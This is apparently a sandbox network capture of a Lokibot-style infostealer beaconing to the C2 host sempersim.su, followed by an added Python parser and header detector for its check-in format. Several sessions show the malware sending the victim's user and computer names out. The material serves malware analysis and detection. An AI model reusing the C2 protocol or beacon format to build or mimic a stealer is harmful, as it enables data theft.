Jun 23, 2022 18:09:55.706176043 CEST | 53 | 64589 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:09:59.580734015 CEST | 55795 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:09:59.687091112 CEST | 53 | 55795 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:10:03.591384888 CEST | 64635 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:10:03.608742952 CEST | 53 | 64635 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:10:05.798867941 CEST | 55269 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:10:05.818321943 CEST | 53 | 55269 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:10:09.542700052 CEST | 63083 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:10:09.563366890 CEST | 53 | 63083 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:10:14.553566933 CEST | 49775 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:10:14.571397066 CEST | 53 | 49775 | 8.8.8.8 | 192.168.2.3
Jun 23, 2022 18:10:16.356290102 CEST | 60195 | 53 | 192.168.2.3 | 8.8.8.8
Jun 23, 2022 18:10:16.375451088 CEST | 53 | 60195 | 8.8.8.8 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 23, 2022 18:08:26.293118954 CEST | 192.168.2.3 | 8.8.8.8 | 0x1976 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:28.453790903 CEST | 192.168.2.3 | 8.8.8.8 | 0x1469 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:30.221090078 CEST | 192.168.2.3 | 8.8.8.8 | 0xc859 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:32.768384933 CEST | 192.168.2.3 | 8.8.8.8 | 0xa4b | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:34.825259924 CEST | 192.168.2.3 | 8.8.8.8 | 0x23e1 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:40.300507069 CEST | 192.168.2.3 | 8.8.8.8 | 0x8dca | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:43.324750900 CEST | 192.168.2.3 | 8.8.8.8 | 0x375e | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:45.421000004 CEST | 192.168.2.3 | 8.8.8.8 | 0x4161 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:47.827784061 CEST | 192.168.2.3 | 8.8.8.8 | 0x7b52 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:50.688333035 CEST | 192.168.2.3 | 8.8.8.8 | 0x57a | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:53.418184042 CEST | 192.168.2.3 | 8.8.8.8 | 0x3452 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:56.029740095 CEST | 192.168.2.3 | 8.8.8.8 | 0xec0d | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:59.746954918 CEST | 192.168.2.3 | 8.8.8.8 | 0x7e7c | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:02.005883932 CEST | 192.168.2.3 | 8.8.8.8 | 0x22b7 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:04.295727015 CEST | 192.168.2.3 | 8.8.8.8 | 0x49b7 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:06.418101072 CEST | 192.168.2.3 | 8.8.8.8 | 0xa7e4 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:08.858531952 CEST | 192.168.2.3 | 8.8.8.8 | 0x5a0b | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:10.958097935 CEST | 192.168.2.3 | 8.8.8.8 | 0x9f82 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:13.136251926 CEST | 192.168.2.3 | 8.8.8.8 | 0x6665 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:17.432912111 CEST | 192.168.2.3 | 8.8.8.8 | 0x5162 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:19.486244917 CEST | 192.168.2.3 | 8.8.8.8 | 0xb736 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:22.007802963 CEST | 192.168.2.3 | 8.8.8.8 | 0x35ba | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:27.695745945 CEST | 192.168.2.3 | 8.8.8.8 | 0x3bb | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:30.935127020 CEST | 192.168.2.3 | 8.8.8.8 | 0xaab0 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:36.710115910 CEST | 192.168.2.3 | 8.8.8.8 | 0xc774 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:41.871608019 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb0e | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:47.565593958 CEST | 192.168.2.3 | 8.8.8.8 | 0x75ce | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:55.686777115 CEST | 192.168.2.3 | 8.8.8.8 | 0x8043 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:59.580734015 CEST | 192.168.2.3 | 8.8.8.8 | 0xa031 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:03.591384888 CEST | 192.168.2.3 | 8.8.8.8 | 0xcea1 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:05.798867941 CEST | 192.168.2.3 | 8.8.8.8 | 0x6375 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:09.542700052 CEST | 192.168.2.3 | 8.8.8.8 | 0x13bf | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:14.553566933 CEST | 192.168.2.3 | 8.8.8.8 | 0x61f0 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:16.356290102 CEST | 192.168.2.3 | 8.8.8.8 | 0x4119 | Standard query (0) | sempersim.su | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 23, 2022 18:08:26.312437057 CEST | 8.8.8.8 | 192.168.2.3 | 0x1976 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:28.471168995 CEST | 8.8.8.8 | 192.168.2.3 | 0x1469 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:30.538393021 CEST | 8.8.8.8 | 192.168.2.3 | 0xc859 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:32.787852049 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4b | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:34.844963074 CEST | 8.8.8.8 | 192.168.2.3 | 0x23e1 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:40.588601112 CEST | 8.8.8.8 | 192.168.2.3 | 0x8dca | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:43.342576981 CEST | 8.8.8.8 | 192.168.2.3 | 0x375e | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:45.440124035 CEST | 8.8.8.8 | 192.168.2.3 | 0x4161 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:48.113367081 CEST | 8.8.8.8 | 192.168.2.3 | 0x7b52 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:50.707300901 CEST | 8.8.8.8 | 192.168.2.3 | 0x57a | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:53.437299013 CEST | 8.8.8.8 | 192.168.2.3 | 0x3452 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:56.049185991 CEST | 8.8.8.8 | 192.168.2.3 | 0xec0d | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:08:59.766767979 CEST | 8.8.8.8 | 192.168.2.3 | 0x7e7c | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:02.023513079 CEST | 8.8.8.8 | 192.168.2.3 | 0x22b7 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:04.315396070 CEST | 8.8.8.8 | 192.168.2.3 | 0x49b7 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:06.437319040 CEST | 8.8.8.8 | 192.168.2.3 | 0xa7e4 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:08.878333092 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a0b | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:10.977695942 CEST | 8.8.8.8 | 192.168.2.3 | 0x9f82 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:13.153110981 CEST | 8.8.8.8 | 192.168.2.3 | 0x6665 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:17.450462103 CEST | 8.8.8.8 | 192.168.2.3 | 0x5162 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:20.042426109 CEST | 8.8.8.8 | 192.168.2.3 | 0xb736 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:22.025185108 CEST | 8.8.8.8 | 192.168.2.3 | 0x35ba | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:27.712416887 CEST | 8.8.8.8 | 192.168.2.3 | 0x3bb | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:30.954468012 CEST | 8.8.8.8 | 192.168.2.3 | 0xaab0 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:36.729382038 CEST | 8.8.8.8 | 192.168.2.3 | 0xc774 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:41.889441967 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb0e | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:47.584813118 CEST | 8.8.8.8 | 192.168.2.3 | 0x75ce | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:55.706176043 CEST | 8.8.8.8 | 192.168.2.3 | 0x8043 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:09:59.687091112 CEST | 8.8.8.8 | 192.168.2.3 | 0xa031 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:03.608742952 CEST | 8.8.8.8 | 192.168.2.3 | 0xcea1 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:05.818321943 CEST | 8.8.8.8 | 192.168.2.3 | 0x6375 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:09.563366890 CEST | 8.8.8.8 | 192.168.2.3 | 0x13bf | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:14.571397066 CEST | 8.8.8.8 | 192.168.2.3 | 0x61f0 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)
Jun 23, 2022 18:10:16.375451088 CEST | 8.8.8.8 | 192.168.2.3 | 0x4119 | No error (0) | sempersim.su | | 104.155.55.2 | A (IP address) | IN (0x0001)

• sempersim.su
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49743 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:26.365309954 CEST | 1129 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 190
    Connection: close
Jun 23, 2022 18:08:26.399478912 CEST | 1130 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: 'ckav.ruhardz093954DESKTOP-716T771k08F9C4E9C79A3B52B3F739430PEPbK
Jun 23, 2022 18:08:27.266164064 CEST | 1130 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:10 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 15
    content-type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.
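The beacon in session 0 is readable without any key: the request is an HTTP/1.0 POST with the "Mozilla/4.08 (Charon; Inferno)" User-Agent and a non-standard Content-Key header, and the body is a 4-byte header followed by length-prefixed strings. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it reconstructs the request line, headers and the 82 body bytes the report prints for session 0 (constructed from the rows above), checks the header traits every session on this page shares, and decodes the body as u16 version, u16 payload type, then records of u16 is_wide (0 = ASCII, 1 = UTF-16LE), u32 byte length and data. The record meanings used in the comments (binary ID, user name, computer name, domain name) follow public Lokibot write-ups and are an assumption; the report itself only shows the strings. Because Content-Length says 190 bytes but the dump stops after 82, the fourth record is cut off mid-string, and the parser reports that instead of raising. The bodies of sessions 10 onward start 12 00 28 00, so the same parser returns payload type 0x28 for them.

```python
import struct

# Request line and headers exactly as printed for session 0 above
# (constructed from the report for this example).
CAPTURED_REQUEST = (
    "POST /gh20/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: sempersim.su\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 306A36E8\r\n"
    "Content-Length: 190\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# The 82 body bytes the report prints in the "Data Raw" row of session 0
# (constructed from the report; Content-Length says the full body was
# 190 bytes, so this dump ends in the middle of a string).
CAPTURED_BODY = bytes.fromhex(
    "12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 "
    "35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 "
    "2d 00 37 00 31 00 36 00 54 00 37"
)

LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


def parse_http_head(raw: str):
    """Split a raw request into (request line, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def looks_like_lokibot_beacon(raw: str) -> bool:
    """Header-level match for the traits shared by every session on this page."""
    request_line, headers = parse_http_head(raw)
    return (
        request_line.startswith("POST ")
        and request_line.endswith(" HTTP/1.0")
        and headers.get("user-agent") == LOKIBOT_USER_AGENT
        and "content-key" in headers
        and headers.get("content-type") == "application/octet-stream"
    )


def parse_beacon_body(body: bytes, max_records: int = 4) -> dict:
    """Decode the layout visible in the dump.

    u16 version, u16 payload type, then records of
    u16 is_wide (0 = ASCII, 1 = UTF-16LE), u32 byte length, data.
    Public write-ups name the first four records binary ID, user name,
    computer name and domain name (assumption; the capture shows only the
    strings). Only max_records records are decoded; whatever follows is
    returned raw as 'rest'. A record whose declared length runs past the
    end of the data is decoded as far as the bytes go and flagged.
    """
    if len(body) < 4:
        raise ValueError("need at least the 4-byte header")
    version, payload_type = struct.unpack_from("<HH", body, 0)
    result = {"version": version, "payload_type": payload_type,
              "strings": [], "truncated": False}
    off = 4
    for _ in range(max_records):
        if off + 6 > len(body):
            result["truncated"] = True
            break
        is_wide, length = struct.unpack_from("<HI", body, off)
        off += 6
        chunk = body[off:off + length]
        if len(chunk) < length:
            result["truncated"] = True
        if is_wide:
            chunk = chunk[: len(chunk) & ~1]  # drop a dangling odd byte
            text = chunk.decode("utf-16-le", errors="replace")
        else:
            text = chunk.decode("ascii", errors="replace")
        result["strings"].append(text)
        off += length
    result["rest"] = body[off:]
    return result


if __name__ == "__main__":
    print("beacon headers match:", looks_like_lokibot_beacon(CAPTURED_REQUEST))
    decoded = parse_beacon_body(CAPTURED_BODY)
    print(f"version=0x{decoded['version']:04x} type=0x{decoded['payload_type']:04x}")
    for text in decoded["strings"]:
        print("  record:", repr(text))
    print("dump truncated:", decoded["truncated"])
```

The header check is deliberately narrow: a stock browser never sends HTTP/1.0 POSTs with that User-Agent and a Content-Key header, so the combination gives a low-noise network indicator independent of the C2 hostname, which is the first thing the operator will rotate.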


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:28.518392086 CEST | 1131 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 190
    Connection: close
Jun 23, 2022 18:08:28.552803993 CEST | 1131 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: 'ckav.ruhardz093954DESKTOP-716T771+08F9C4E9C79A3B52B3F739430votmd
Jun 23, 2022 18:08:29.393347025 CEST | 1132 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:12 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 15
    content-type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49772 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:53.475796938 CEST | 1355 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:08:53.510099888 CEST | 1356 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:54.444253922 CEST | 1356 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:37 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49773 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:56.128163099 CEST | 1357 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:08:56.162686110 CEST | 1357 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:56.994401932 CEST | 1358 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:40 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49775 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:59.805159092 CEST | 1365 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:08:59.839162111 CEST | 1366 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:00.835938931 CEST | 1366 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:44 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49776 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:02.062352896 CEST | 1367 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:02.096342087 CEST | 1367 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:02.967256069 CEST | 1367 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:46 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49777 | 104.155.55.2 | 80 | C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:04.362565994 CEST | 1368 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:04.397391081 CEST | 1368 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:05.276468039 CEST | 1369 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:48 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 15 | Source IP: 192.168.2.3 | Source Port: 49778 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:06.486196995 CEST | 1370 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:06.520549059 CEST | 1370 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:07.428229094 CEST | 1377 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:50 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 16 | Source IP: 192.168.2.3 | Source Port: 49780 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:08.917855024 CEST | 1378 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
